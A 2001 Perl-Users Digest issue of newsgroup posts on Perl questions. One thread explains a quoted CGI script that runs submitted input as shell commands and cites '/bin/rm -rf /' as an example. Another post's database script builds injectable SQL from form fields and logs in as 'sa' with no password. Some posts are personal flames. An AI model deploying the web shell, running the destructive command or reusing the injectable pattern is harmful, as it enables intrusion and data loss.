[19469] in Perl-Users-Digest
Perl-Users Digest, Issue: 1664 Volume: 10
daemon@ATHENA.MIT.EDU (Perl-Users Digest)
Fri Aug 31 03:05:32 2001
Date: Fri, 31 Aug 2001 00:05:14 -0700 (PDT)
From: Perl-Users Digest <Perl-Users-Request@ruby.OCE.ORST.EDU>
To: Perl-Users@ruby.OCE.ORST.EDU (Perl-Users Digest)
Message-Id: <999241513-v10-i1664@ruby.oce.orst.edu>
Content-Type: text
Perl-Users Digest Fri, 31 Aug 2001 Volume: 10 Number: 1664
Today's topics:
Re: 'filtering' a hash <goldbb2@earthlink.net>
[OT]++ Attribution of Past Postings <jkline@one.net>
Re: [OT]++ Attribution of Past Postings <godzilla@stomp.stomp.tokyo>
Re: a mystery to me: EOF (Trewth Seeker)
Re: arrays question <goldbb2@earthlink.net>
Re: Can't locate misc.pl in @INC (Damian James)
Closing a mssql databse using mssql::sqllib <logix001@nospam.hotmail.com>
Re: combining varibles <alexdgreen@hotmail.com>
Re: Dangerous Perl Script? <wyzelli@yahoo.com>
Re: Dangerous Perl Script? <godzilla@stomp.stomp.tokyo>
Re: Dangerous Perl Script? <godzilla@stomp.stomp.tokyo>
Re: Dangerous Perl Script? <wyzelli@yahoo.com>
Re: Dangerous Perl Script? (Malcolm Dew-Jones)
Re: Dangerous Perl Script? (Martien Verbruggen)
Re: Dangerous Perl Script? <godzilla@stomp.stomp.tokyo>
Re: DBI: Select statements that return results with con <goldbb2@earthlink.net>
Re: Difference between .pl, .cgi, and .pm File Extensio (Tad McClellan)
Re: Difference between .pl, .cgi, and .pm File Extensio (Trewth Seeker)
Re: each() bug (?) (Bernard El-Hagin)
Digest Administrivia (Last modified: 6 Apr 01) (Perl-Users-Digest Admin)
----------------------------------------------------------------------
Date: Thu, 30 Aug 2001 21:35:05 -0400
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: 'filtering' a hash
Message-Id: <3B8EE9C9.E2BF44C8@earthlink.net>
Abigail wrote:
>
> Anne Janse (A.S.Janse@azu.nl) wrote on MMCMXIII September MCMXCIII in
> <URL:news:Pine.GSO.4.30.0108221304320.14748-100000@dizzy.azu.nl>:
> ## Hi all,
> ##
> ## I've got a hash %hash and an array @array
> ## and I'd like to make a new hash %newhash that contains only those
> ## $key-$value pairs from %hash of which there is no $key in @array.
> ##
> ## In other words, I'd like to throw away all $key-$value pairs
> ## from %hash of which $key is in @array.
> ##
> ## How can I do this? The problem doesn't look too hard, but my perl
> ## experience is quite limited..
>
> Two ways:
>
> my %newhash = %hash;
> delete @newhash {@array};
>
> my %temp = map {$_ => 1} @array;
> my @temp = grep {!$temp {$_}} keys %hash;
> my %newhash;
> @newhash {@temp} = @hash {@temp};
Lots more than two:
my %newhash = map { $_ => $hash{$_} } grep {
my $x = $_; !grep { $x eq $_ } @array
} keys %hash;
my (%temp, %newhash);
@temp{@array} = ();
foreach( grep !exists $temp{$_}, keys %hash ) {
$newhash{$key} = $hash{$key};
}
my (%temp, %newhash);
@temp{@array} = ();
while( my( $key, $val ) = each %hash ) {
$newhash{$key} = $val if !exists $temp{$key};
}
I prefer the each() solution, especially if %hash is very big.
--
"I think not," said Descartes, and promptly disappeared.
------------------------------
Date: Fri, 31 Aug 2001 02:14:09 -0400
From: Joe Kline <jkline@one.net>
Subject: [OT]++ Attribution of Past Postings
Message-Id: <3B8F2B31.8F3D0068@one.net>
"Godzilla!" wrote:
> <SNIP>
> other racist events here on the internet. This first incident,
> is, of course, your posting of near two pages of vile, vulgar
> and vehement racial slurs, under your fake name, Joe Kline.
Ahem. I posted that misguided attempt at satire.
Please try to properly attribute the sources you cite.
joe
------------------------------
Date: Thu, 30 Aug 2001 23:36:06 -0700
From: "Godzilla!" <godzilla@stomp.stomp.tokyo>
Subject: Re: [OT]++ Attribution of Past Postings
Message-Id: <3B8F3056.7566E38E@stomp.stomp.tokyo>
Joe Kline wrote:
> Godzilla! wrote:
> > <SNIP>
> > other racist events here on the internet. This first incident,
> > is, of course, your posting of near two pages of vile, vulgar
> > and vehement racial slurs, under your fake name, Joe Kline.
> Ahem. I posted that misguided attempt at satire.
> Please try to properly attribute the sources you cite.
NNTP-Posting-Host: 206.125.69.82
Date: 7 Feb 2000 18:31:51 -0800
Well goodness, look who suddenly shows up after an
absence of going on two years. If it isn't the racist
himself, still deep in denial. What a coincidence,
this very day no less.
You are not a very bright boy. You played right into my hand.
Being the CLPM Troll pales compared to being a known racist.
Nervous about being labeled this vile racist you are, Frank?
Godzilla!
------------------------------
Date: 30 Aug 2001 21:49:29 -0700
From: trewth_seeker@yahoo.com (Trewth Seeker)
Subject: Re: a mystery to me: EOF
Message-Id: <d690a633.0108302049.788b8c32@posting.google.com>
ziegler@algorilla.de (Joachim Ziegler) wrote in message news:<93aad7d0.0108300439.1844dabb@posting.google.com>...
> hi perlers,
>
> reading the documentation of Perl's eof(), i'm wondering what EOF
> really is.
It's a condition that indicates that there's nothing more to read.
Programming is about abstractions; reality isn't relevant. :-)
> pressing CTRL-D on my keyboard is said to generate an
> "end-of-file-character". so is this a legal ASCII-character?
ctrl-D is interpreted by the tty driver as meaning "end of file";
that causes the system to return the characters already typed
to the caller. For instance, if you type abc^D the program
that did a read call gets "abc" in its buffer and a return value
of 3. That doesn't seem to have much to do with "end of file",
does it? Well, if you type ^D at the beginning of the line,
*no* characters go in the buffer and read() returns 0. 0 from
read() always means "end of file".
> (btw, how do i generate this character by a keyboard-stroke under
> Windows?)
It depends on what program is reading the keyboard. If it is some
unix emulator like cygwin, ^D will be recognized as end-of-file.
But standard Windows programs recognize ^Z instead.
> i can't find it in my ASCII-table, because it does not show the
> non-printable characters. can someone please point me to a complete table?
Go to www.google.com and learn how to search for things; that
will serve you far better than asking specific questions.
> i'm conjecturing the following:
>
> the EOF-character is *not* the last character of any file, right?
Not on sensible systems, but MSDOS actually recognizes ^Z in
a file as indicating the end -- this has to do with early
versions not storing the actual length of the file anywhere.
*That* is how sensible systems do it -- they know how long
the file is, and thus which is the last character in the file.
> the EOF returned by C's getc() is *not* the same as the above
> character generated by a keyboard-stroke, but a symbolic constant
> (usually negative) returned by this function to indicate, that there
> are no more characters left in a file/stream... right?
Right. If you type ^D on the keyboard, your C program will get
EOF returned from getc(), but the relationship is not anything
so direct as ^D being converted into EOF.
> but internally, where does getc() know from that the stream is empty?
> it's system-dependent, right?
Right. For terminals, it's the fact that you typed ^D. For files,
its the fact that the file length stored on the disk says that's
where the file ends. For magnetic tape, it's a special pattern
of magnetization that the hardware senses and informs the tape
driver and the tape driver represents to higher software levels
as "enf-of-file". It's all symbolic, abstract manipulations.
> the last line read by a <FILEHANDLE>-construct in Perl does *never*
> contain any special EOF-character at the end, right?
Is that a trick question? :-) The file could contain any character
as the last character, including ^D or ^Z. It's all a matter
of how it's interpreted. But for all practical purposes, from the
POV of the program there is no such thing as an EOF-character,
just eof as a condition.
------------------------------
Date: Fri, 31 Aug 2001 02:02:37 -0400
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: arrays question
Message-Id: <3B8F287D.757B0E32@earthlink.net>
Tad McClellan wrote:
>
> Calin Guga <CalinG@cfgroup.ca> wrote:
> >
> > How could I place 2(for ex. @numbers and @dates) or more arrays
> > together in a file, array 1 items would go on first row, array 2
> > items would go on second, etc. separated by comma, consecutively?
>
> { local $" = ',';
> die "Barf! Commas in the data fields!\n"
> if grep /,/, @numbers, @dates;
> print FILE "@numbers\n";
> print FILE "@dates\n";
> }
Unless perl has a magical optomization I don't know of, this first
stringifies and joins, then prints. ISTM it would be better to have
print itself do the stringifying and inserting of commas.
{ die "Barf! Commas in the data fields!\n"
if grep /,/, @numbers, @dates;
my $sel = select(FILE);
local $, = ',';
print @numbers; print "\n";
print @dates ; print "\n";
select($sel);
}
--
"I think not," said Descartes, and promptly disappeared.
------------------------------
Date: 31 Aug 2001 01:29:14 GMT
From: damian@qimr.edu.au (Damian James)
Subject: Re: Can't locate misc.pl in @INC
Message-Id: <slrn9otq0f.id1.damian@puma.qimr.edu.au>
Michael Ditum chose Thu, 30 Aug 2001 17:29:38 +0100 to say this:
>...
>i know its not in any of the stated paths as its held in
>c:\inetpub\wwwroot\cgi-bin\time_keeping.
>it doesn't seem to be checking the current working directory and i can't
>work out how to change it.
>
>any help would be greatly appreciated!
>
%perldoc -q library
Found in /usr/local/lib/perl5/5.00503/pod/perlfaq8.pod
How do I keep my own module/library directory?
...
How do I add the directory my program lives in to the module/library
search path?
Cheers,
Damian
--
@:=grep!($;+=m!$/|#!),split//,<DATA>;@;=0..$#:;while(@;){for($;=@;;--$;;)
{@;[$;,$:]=@;[$:,$;]if($:=rand$;+$|)!=$;}push@|,shift@;if$;[0]==@|;select
$,,$,,$,,1/80;print qq x\bxx((@;+@|)*$|++),@:[@|,@;],!@;&&$/} __END__
Just another Perl Hacker # rev 3.1 -- a JAPH in progress, I guess...
------------------------------
Date: Fri, 31 Aug 2001 06:42:58 GMT
From: "Logix" <logix001@nospam.hotmail.com>
Subject: Closing a mssql databse using mssql::sqllib
Message-Id: <SlGj7.28457$6x5.5961366@afrodite.telenet-ops.be>
Hello!
I'm having troubles closing my mssql db using the script below. When I don't
close them perl jus takes the first database I open to execute every query
on. When I use the script below (this is with dbclose) the script stalls
when it has to execute the second query. Do you have any solutions?
Thx anyway
Logix
This is the code:
#!/usr/bin/perl
use MSSQL::Sqllib;
#maken van een UID
srand(time);
$uid = int(rand(1000000));
print "Set-Cookie: NAME=$uid\n";
#inlezen van de doorgegeven parameters
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
#opslaan van de doorgegeven parameters
$conn1 = sql_init("bnbeluiwkaho2", "sa", "", "TEST");
@a = sql("insert into Users values
('$uid','$FORM{'username'}','$FORM{'password'}','$FORM{'server'}','')");
$conn1 ->dbclose;
#HTML tekst
print "Content-type: text/html\n\n";
print <<END;
<html>
<head>
<title>Display a database using perl</title>
</head>
<body bgcolor=\"#ffff66\">
<H1><font face=\"Comic Sans MS\"><u>You are now logged on as
\"$FORM{'username'}\" at \"$FORM{'server'}\"</font></u></H1>
<HR>
<font face=\"Comic Sans MS\">You have been assigned UID \"$uid\" and this is
stored in a cookie on your browser</font><BR><BR>
<font face=\"Comic Sans MS\">Which database would you like to use?</font>
END
# Log into the server.
$conn2 = sql_init("$FORM{'server'}", "$FORM{'username'}",
"$FORM{'password'}", "master");
# Run a query.
@x = sql("exec sp_databases");
$conn2 ->dbclose;
#uitprinten van de verschillende databases
print "<FORM METHOD=POST ACTION=\'show_table.pl\'>";
print "<select name=\"Databases\">";
foreach $x (@x) {
print "<option value=\"$$x{'DATABASE_NAME'}\">$$x{'DATABASE_NAME'}";
}
print "<INPUT TYPE=SUBMIT VALUE=\"GO!\">";
print "</FORM>\n</TABLE>\n</BODY>\n</HTML>";
------------------------------
Date: Fri, 31 Aug 2001 08:08:37 +0200
From: "Alex Green" <alexdgreen@hotmail.com>
Subject: Re: combining varibles
Message-Id: <9mn9l6$2u86t$1@ID-106172.news.dfncis.de>
Thanks, that did the trick. Cheers for the help.
"Craig Berry" <cberry@cinenet.net> wrote in message
news:Xns910D7BF3E21EEcberrycinenetnet1@207.126.101.92...
> "Alex Green" <alexdgreen@hotmail.com> wrote in
> news:9mljba$2r1m3$1@ID-106172.news.dfncis.de:
> > Right well basically I have a perl/cgi script retreiving values from an
> > html form, with a first name and a last name field and what I need is
> > these to vars, lets say $fn and $ln to become combined to become
> > $owner.
>
> $owner = "$fn $ln"; # Assuming you want a space between them;
> # leave it out if not, or use
> $owner = $fn . $ln; # instead.
>
> > Not really sure whether combine is the right word,
>
> Usually 'concatenate' is used for this string-combining operation.
'String
> interpolation' descibes my first proposed method above.
>
> > but basically I need
> > to be able to print them as an entire text string. Does that make
> > sense?
>
> If all you want to do is print them, then there's no need to build a
> separate variable to hold a concatenated form; just print them both as
you'd
> like them to be combined in the output.
>
> print "$fn $ln";
>
> --
> Craig Berry <http://www.cinenet.net/~cberry/>
> "That which is now known, was once only imagined." - William Blake
>
------------------------------
Date: Fri, 31 Aug 2001 14:43:23 +0930
From: "Wyzelli" <wyzelli@yahoo.com>
Subject: Re: Dangerous Perl Script?
Message-Id: <7YEj7.22$ju4.1114@wa.nnrp.telstra.net>
"Martien Verbruggen" <mgjv@tradingpost.com.au> wrote in message
news:slrn9ou5fi.2rs.mgjv@verbruggen.comdyn.com.au...
> On Fri, 31 Aug 2001 04:31:16 GMT,
> What A Man ! <whataman@home.com> wrote:
> > I'm told the below script is dangerous. It just looks like a bunch of
> > regexs to me. Can someone explain what it does?
> >
> > #!/usr/bin/perl
>
> no -w, no -T.
> no strict
>
> Very dangerous :)
>
> > print "Content-type: text/html\n\n";
> > if ( $ENV{'CONTENT_LENGTH'} )
> > read(STDIN,$_,$ENV{'CONTENT_LENGTH'});
> > s/(.)*=//; s/\+/ /g; s/%(..)/pack("c",hex($1))/ge;
> > $out=`$_ 2>&1`; print "\%: $_<PRE>$out</PRE>"; }
> > print "<FORM METHOD=POST>
> ><INPUT TYPE=\"TEXT\" NAME=\"text\" SIZE=60 MAXLENGTH=300>
> ><INPUT TYPE=\"SUBMIT\" VALUE=\"Ok\"></FORM>";
>
> If run as a CGI program, It more or less executes whatever is
> submitted to it in a post. it doesn't do a particularly good job at
> decoding its input, but if you type something like (but do not try
> this!)
>
> /bin/rm -rf /
>
> in the form that it pops up, it'll destroy as many files on the hosts
> file systems as the user it runs as is allowed to (providing it's
> running on some Unix-like OS).
>
> Not a good program at all.
In addition, if you submit a 200Mb POST, then your server will continue to
read data, allocating more and more RAM to your process, and then possibly
swap, until maybe it eventually grinds to a halt. This is a form of DOS
attack, to which this script is vulnerable.
CGI.pm on the other hand has built in limits (configurable) of how large a
POST to accept, after which it errors and dumps the connection.
Wyzelli
--
($a,$b,$w,$t)=(' bottle',' of beer',' on the wall','Take one down, pass it
around');
for(reverse(1..100)){$s=($_!=1)?'s':'';$c.="$_$a$s$b$w\n$_$a$s$b\n$t\n";
$_--;$s=($_!=1)?'s':'';$c.="$_$a$s$b$w\n\n";}print"$c*hic*";
------------------------------
Date: Thu, 30 Aug 2001 22:31:34 -0700
From: "Godzilla!" <godzilla@stomp.stomp.tokyo>
Subject: Re: Dangerous Perl Script?
Message-Id: <3B8F2136.C581B05D@stomp.stomp.tokyo>
Martien Verbruggen wrote:
> What A Man ! wrote:
(snipped)
> > I'm told the below script is dangerous. It just looks like a bunch of
> > regexs to me. Can someone explain what it does?
> > #!/usr/bin/perl
> no -w, no -T.
> no strict
> Very dangerous :)
Your advice is even more dangerous. You are indicating
use of warnings, strict and taint will assure adequate
security. Warnings and strict serve little, if any,
purpose for security. Taint, at best, is very weak
security; it is full of security holes.
This type of inappropriate advice you provide, is
highly irresponsible and a reflection of your having
poor Perl programming skills.
Godzilla!
------------------------------
Date: Thu, 30 Aug 2001 22:43:24 -0700
From: "Godzilla!" <godzilla@stomp.stomp.tokyo>
Subject: Re: Dangerous Perl Script?
Message-Id: <3B8F23FC.319832B4@stomp.stomp.tokyo>
Wyzelli wrote:
> Martien Verbruggen wrote:
> > What A Man ! wrote:
(snipped)
> > > I'm told the below script is dangerous. It just looks like a bunch of
> > > regexs to me. Can someone explain what it does?
> In addition, if you submit a 200Mb POST, then your server will continue to
> read data, allocating more and more RAM to your process, and then possibly
> swap, until maybe it eventually grinds to a halt. This is a form of DOS
> attack, to which this script is vulnerable.
> CGI.pm on the other hand has built in limits (configurable) of how large a
> POST to accept, after which it errors and dumps the connection.
Yours is Perl 5 Cargo Cultism Dogma. Either method can be easily
configured to limit Content Length. You are inferring a custom
read and parse cannot be configured to limit input length.
if ($ENV{'CONTENT_LENGTH'} > 131072)
{ &Aiyaka; }
My subroutine Aiyaka is rather creative in what it does.
A reader will be well advised to research both methods of reading
and parsing form data input. A custom read and parse is almost
always exceptionally faster, exceptionally more efficient and
certainly more configurable than CGI.pm. Each method have benefits
and detriments. These should be weighed based upon unique needs
after careful research and reading.
Godzilla!
--
#!perl
print "Content-type: text/plain\n\n";
use Benchmark;
print "Run One:\n\n";
&Time;
print "\n\nRun Two:\n\n";
&Time;
print "\n\nRun Three:\n\n";
&Time;
sub Time
{
timethese (100000,
{
'name1' =>
'$ENV{QUERY_STRING} = "north=north&south=south&east=east&west=west";
$buffer = $ENV{QUERY_STRING};
@checks = split(/&/, $buffer);
foreach $check (@checks)
{
($name, $value) = split(/=/, $check);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
$north = "$FORM{north}";
$south = "$FORM{south}";
$east = "$FORM{east}";
$west = "$FORM{west}";',
'name2' =>
'$ENV{QUERY_STRING} = "north=north&south=south&east=east&west=west";
use CGI;
my $query = new CGI;
$north = $query->param(north);
$south = $query->param(east);
$east = $query->param(south);
$west = $query->param(west);',
} );
}
PRINTED RESULTS:
________________
Run One:
Benchmark: timing 100000 iterations of name1, name2...
name1: 8 wallclock secs ( 8.46 usr + 0.00 sys = 8.46 CPU) @ 11820.33/s
name2: 127 wallclock secs (126.32 usr + 0.00 sys = 126.32 CPU) @ 791.64/s
Run Two:
Benchmark: timing 100000 iterations of name1, name2...
name1: 9 wallclock secs ( 8.79 usr + 0.00 sys = 8.79 CPU) @ 11376.56/s
name2: 127 wallclock secs (126.49 usr + 0.00 sys = 126.49 CPU) @ 790.58/s
Run Three:
Benchmark: timing 100000 iterations of name1, name2...
name1: 8 wallclock secs ( 8.68 usr + 0.00 sys = 8.68 CPU) @ 11520.74/s
name2: 125 wallclock secs (126.27 usr + 0.00 sys = 126.27 CPU) @ 791.95/s
------------------------------
Date: Fri, 31 Aug 2001 15:50:01 +0930
From: "Wyzelli" <wyzelli@yahoo.com>
Subject: Re: Dangerous Perl Script?
Message-Id: <BWFj7.23$ju4.1120@wa.nnrp.telstra.net>
"Godzilla!" <godzilla@stomp.stomp.tokyo> wrote in message
news:3B8F23FC.319832B4@stomp.stomp.tokyo...
>
> Yours is Perl 5 Cargo Cultism Dogma. Either method can be easily
> configured to limit Content Length. You are inferring a custom
> read and parse cannot be configured to limit input length.
I made no such implication. You inferred that I did. You don't even know
what infer means.
> if ($ENV{'CONTENT_LENGTH'} > 131072)
> { &Aiyaka; }
>
> My subroutine Aiyaka is rather creative in what it does.
Snip of code
Whilst it would be expected that direct coding would run significantly
faster that CGI.pm, and that would never be disputed, even on your computer
the difference as perceived by the end-user of a web page is so small as to
be invisible. By that I mean the run time of a single instance of your
example is in the order of 1.27 milliseconds, and the user's browser and
Internet connection would normally take up to a second to process the entire
transaction (on a fast connection) so the saving in script time is
insignificant in the scheme of things, compared to the potential saving of
hours of development and debugging time.
Even with 100,000 hits on this script, you would only save 119 seconds of
run time, over a period of 'however long it takes to do 100,000 hits'.
This is an example of spending a lot of time and effort for little real (not
imagined) advantage.
This is a reason to use modules.
This is a reason to not re-invent the wheel.
Wyzelli
--
push@x,$_ for(a..z);push@x,' ';
@z='092018192600131419070417261504171126070002100417'=~/(..)/g;
foreach $y(@z){$_.=$x[$y]}y/jp/JP/;print;
------------------------------
Date: 30 Aug 2001 23:30:09 -0800
From: yf110@vtn1.victoria.tc.ca (Malcolm Dew-Jones)
Subject: Re: Dangerous Perl Script?
Message-Id: <3b8f2ef1@news.victoria.tc.ca>
Wyzelli (wyzelli@yahoo.com) wrote:
: In addition, if you submit a 200Mb POST, then your server will continue to
: read data, allocating more and more RAM to your process, and then possibly
: swap, until maybe it eventually grinds to a halt. This is a form of DOS
: attack, to which this script is vulnerable.
: CGI.pm on the other hand has built in limits (configurable) of how large a
: POST to accept, after which it errors and dumps the connection.
Yes, but last time I checked, CGI.pm has no *default* limit. so virtually
all cgi scripts that use CGI.pm are vunerable to the attack.
------------------------------
Date: Fri, 31 Aug 2001 04:43:30 GMT
From: mgjv@tradingpost.com.au (Martien Verbruggen)
Subject: Re: Dangerous Perl Script?
Message-Id: <slrn9ou5fi.2rs.mgjv@verbruggen.comdyn.com.au>
On Fri, 31 Aug 2001 04:31:16 GMT,
What A Man ! <whataman@home.com> wrote:
> I'm told the below script is dangerous. It just looks like a bunch of
> regexs to me. Can someone explain what it does?
>
> #!/usr/bin/perl
no -w, no -T.
no strict
Very dangerous :)
> print "Content-type: text/html\n\n";
> if ( $ENV{'CONTENT_LENGTH'} ) {
> read(STDIN,$_,$ENV{'CONTENT_LENGTH'});
> s/(.)*=//; s/\+/ /g; s/%(..)/pack("c",hex($1))/ge;
> $out=`$_ 2>&1`; print "\%: $_<PRE>$out</PRE>"; }
> print "<FORM METHOD=POST>
><INPUT TYPE=\"TEXT\" NAME=\"text\" SIZE=60 MAXLENGTH=300>
><INPUT TYPE=\"SUBMIT\" VALUE=\"Ok\"></FORM>";
If run as a CGI program, It more or less executes whatever is
submitted to it in a post. it doesn't do a particularly good job at
decoding its input, but if you type something like (but do not try
this!)
/bin/rm -rf /
in the form that it pops up, it'll destroy as many files on the hosts
file systems as the user it runs as is allowed to (providing it's
running on some Unix-like OS).
Not a good program at all.
Martien
--
Martien Verbruggen |
Interactive Media Division | "In a world without fences,
Commercial Dynamics Pty. Ltd. | who needs Gates?"
NSW, Australia |
------------------------------
Date: Thu, 30 Aug 2001 23:59:51 -0700
From: "Godzilla!" <godzilla@stomp.stomp.tokyo>
Subject: Re: Dangerous Perl Script?
Message-Id: <3B8F35E7.762DD82B@stomp.stomp.tokyo>
Wyzelli wrote:
> Godzilla! wrote:
> > Yours is Perl 5 Cargo Cultism Dogma. Either method can be easily
> > configured to limit Content Length. You are inferring a custom
> > read and parse cannot be configured to limit input length.
> Whilst it would be expected that direct coding would run significantly
> faster that CGI.pm, and that would never be disputed, even on your computer
> the difference as perceived by the end-user of a web page is so small as to
> be invisible. By that I mean the run time of a single instance of your
> example is in the order of 1.27 milliseconds,
You have made a presumption benchmark results, event times
in general, can be linear extrapolated. This is display of
how little you know about good Scientific Method and how
little you know about Mathematical calculations.
> Even with 100,000 hits on this script, you would only save 119 seconds of
> run time, over a period of 'however long it takes to do 100,000 hits'.
How ironic. Last year you and many others ragged on me for a week
claiming examples of sites experiencing millions of hits per day
and how important it is to optimize code to the max.
Today you are claiming just the opposite.
Clearly you don't walk the talk, like I do. You make up
this mule manure at your ego's command.
> This is an example of spending a lot of time and effort for little real (not
> imagined) advantage.
Oh my, you selective forgot to mention this severe memory bloat
factor of CGI.pm, accounting, in large part, for its snail pace.
> This is a reason to use modules.
This is ego mule manure.
> This is a reason to not re-invent the wheel.
This is ego mule manure.
Godzilla! Queen Of Imaginative Wheels.
--
http://la.znet.com/~callgirl/wheel.gif
------------------------------
Date: Fri, 31 Aug 2001 02:15:34 -0400
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: DBI: Select statements that return results with control characters
Message-Id: <3B8F2B86.A6845237@earthlink.net>
Ben Holness wrote:
>
> Hi all,
>
> I am running a relatively simple perl script that includes the
> following lines, located within a loop that increments $ID:
>
> $stmt="SELECT name, description FROM info WHERE id='$ID'";
> @array=$dbh->selectrow_array($stmt);
> if (!($dbh->errstr))
> {
> print "Results - Name: @array[0], \nDescription: \n@array[1]\n";
> }
>
> This works for some of the records in the database, but a number of
> them have carriage returns (and possibly other control characters) in
> the description field. When one of these records is encounted, both
> Name and Description become empty.
There's no reason for it to work with some but not others as you
describe, IF they got into the database correctly. Are you sure that
the items you're speaking of are actually in the database?
> How can I extract description, preserving the control characters?
> (i.e. when it prints I want the formatting to be retained)
The problem isn't formatting being lost on extraction, it's that you did
something funky when you put it in [like for example interpolating the
data into the statement rather than using placeholders].
Assuming your insert was done as follows:
while( <DATA> ) {
my( $name, $desc, $id ) = split;
$insert->do( qq[
INSERT ('$name', '$desc', '$id')
into tablename
] );
}
Replace it with:
my $insert = $dbi->prepare( q[INSERT (?, ?, ?) into tablename] );
while( <DATA> ) {
my( $name, $desc, $id ) = split;
$insert->execute($name, $desc, $id);
}
See how the placeholders work?
And your retrieval to be like:
my $fetch = $dbi->prepare( q[
SELECT name, description
FROM tablename
WHERE id >= ? AND id <= ?
] );
$fetch->execute( $minid, $maxid );
while( my ($name, $desc) = $fetch->fetchrow_array ) {
print "Results - Name: $name, \nDescription: \n$desc\n";
}
--
"I think not," said Descartes, and promptly disappeared.
------------------------------
Date: Thu, 30 Aug 2001 22:23:18 -0400
From: tadmc@augustmail.com (Tad McClellan)
Subject: Re: Difference between .pl, .cgi, and .pm File Extensions.
Message-Id: <slrn9ott8m.1lq.tadmc@tadmc26.august.net>
[ Please put your comments *following* the quoted text that
you are commenting on.
Thank you.
]
Bob Holden <bob@eawf.nospam.com> wrote:
>On Thu, 30 Aug 2001 14:57:13 -0400, brian d foy <comdog@panix.com>
>wrote:
>
>>In article <h1usotogbc2s5vrftjvmf2r6s1cqe53k94@4ax.com>,
>>bob@eawf.nospam.com wrote:
>>
>>> What I'm starting to glean out of this is that Perl Modules need to be
>>> Installed onto a server or into Perl itself. Is that right?
>>
>>well, any code that you intend to pull into your scripts need
>>to be available for perl to read. that commonly means that
>>the code needs to be installed with perl.
>But I thought that that was what the use command was for in a
>script...to add-in features/modules when they are needed. Since Perl
>is interpretive, I assumed
^^^^^^^^^
Warning Will Robinson!
Why not look it up and _know_?
It is a bit down in
perldoc perlrun
but it gets to it eventually:
----------------------------
After locating your program, Perl compiles the entire program to an
internal form. If there are any compilation errors, execution of the
program is not attempted. (This is unlike the typical shell script,
which might run part-way through before finding a syntax error.)
If the program is syntactically correct, it is executed.
----------------------------
Perl is a compile-and-go language. It has a "compile" phase
and a "run" (interpretive kinda) phase.
>that this happens on the fly,
I assume "on the fly" means "at run time".
"require" is run time.
"use" is compile time.
But either way, perl will need to know _where_ to get the
code to be included, whether at compile or run time.
>so why
>"Install" or "Make" the files?
Because there _is_ a compiler there, even if you don't see it.
--
Tad McClellan SGML consulting
tadmc@augustmail.com Perl programming
Fort Worth, Texas
------------------------------
Date: 30 Aug 2001 21:05:19 -0700
From: trewth_seeker@yahoo.com (Trewth Seeker)
Subject: Re: Difference between .pl, .cgi, and .pm File Extensions.
Message-Id: <d690a633.0108302005.b8f5f4a@posting.google.com>
Bob Holden <bob@eawf.nospam.com> wrote in message news:<h1usotogbc2s5vrftjvmf2r6s1cqe53k94@4ax.com>...
> On 30 Aug 2001 09:51:09 GMT, anno4000@lublin.zrz.tu-berlin.de (Anno
> Siegel) wrote:
>
> >According to Alan J. Flavell <flavell@mail.cern.ch>:
> >> On Aug 29, brian d foy inscribed on the eternal scroll:
> >>
> >> (re. use of .pl as a filename 'extension'):
> >>
> >> > perl *library*. some people frown on using this (or any)
> >> > extension for scripts. sometimes you'll see .plx (perl
> >> > executable) since some operating systems jsut can't do
> >> > without.
> >>
> >> Well, since the canonical building procedure starts with
> >>
> >> perl Makefile.PL
> >>
> >> it would seem that someone "in authority" thinks that Perl scripts
> >> have a filename extension of .PL (upper case).
> >
> >I believe this assumes more deliberation than actually went into the
> >naming of that file. Before MakeMaker, module authors packed their
> >own Makefile with a product. This led to subtle and not-so-subtle
> >differences in the make process for each module.
> >
> >As a remedy, Andreas Koenig wrote MakeMaker. To make it clear that
> >you (the module author) were now supposed to replace your former
> >Makefile with an equivalent template for MakeMaker, and as an indication
> >to you (the module installer) that you were supposed to run it as a
> >Perl program, the standard name for the template became Makefile.PL,
> >using the established .pl suffix for a Perl program. Why upper-case,
> >I do not know.
> What I'm starting to glean out of this is that Perl Modules need to be
> Installed onto a server or into Perl itself. Is that right?
No, not really. I strongly suggest that you purchase and read
the O'Reilly books, _Programming Perl_ and _Perl Cookbook_, and
only ask questions here once you've done so -- you will spend
far less time with that approach.
> >
> >I am Cc'ing this to Andreas (Hi!) so he can comment if he feels like it.
> >
> >Anno
------------------------------
Date: Thu, 30 Aug 2001 12:58:14 +0000 (UTC)
From: bernard.el-hagin@lido-tech.net (Bernard El-Hagin)
Subject: Re: each() bug (?)
Message-Id: <slrn9osdnt.2n3.bernard.el-hagin@gdndev25.lido-tech>
On 30 Aug 2001 16:05:57 +0400, Ilya Martynov <ilya@martynov.org> wrote:
>
>Any ideas why following code (under Perl 5.6.1) causes infinite loop?
>
> while(my($value, $uiname) = each %{{ true => 'Yes', false => 'No' }}) {
> print "$uiname\n";
> }
>
>While this code works as expected
>
> my $href = { true => 'Yes', false => 'No' };
> while(my($value, $uiname) = each %{$href}) {
> print "$uiname\n";
> }
In the first snippet you're creating a new hashref each time through
the loop.
Cheers,
Bernard
--
perl -l54e's yyw q q tvmrx "h\ywx ersxliv zivp legoiv"qiy;y #a-zA-Z#d-gu-z#
chefghijklmnopqrstuvwxyzcJab-def-uPwxyzc;s j j s u u s t t s r r s
ppevalpereeteueje'
------------------------------
Date: 6 Apr 2001 21:33:47 GMT (Last modified)
From: Perl-Users-Request@ruby.oce.orst.edu (Perl-Users-Digest Admin)
Subject: Digest Administrivia (Last modified: 6 Apr 01)
Message-Id: <null>
Administrivia:
The Perl-Users Digest is a retransmission of the USENET newsgroup
comp.lang.perl.misc. For subscription or unsubscription requests, send
the single line:
subscribe perl-users
or:
unsubscribe perl-users
to almanac@ruby.oce.orst.edu.
To submit articles to comp.lang.perl.announce, send your article to
clpa@perl.com.
To request back copies (available for a week or so), send your request
to almanac@ruby.oce.orst.edu with the command "send perl-users x.y",
where x is the volume number and y is the issue number.
For other requests pertaining to the digest, send mail to
perl-users-request@ruby.oce.orst.edu. Do not waste your time or mine
sending perl questions to the -request address, I don't have time to
answer them even if I did know the answer.
------------------------------
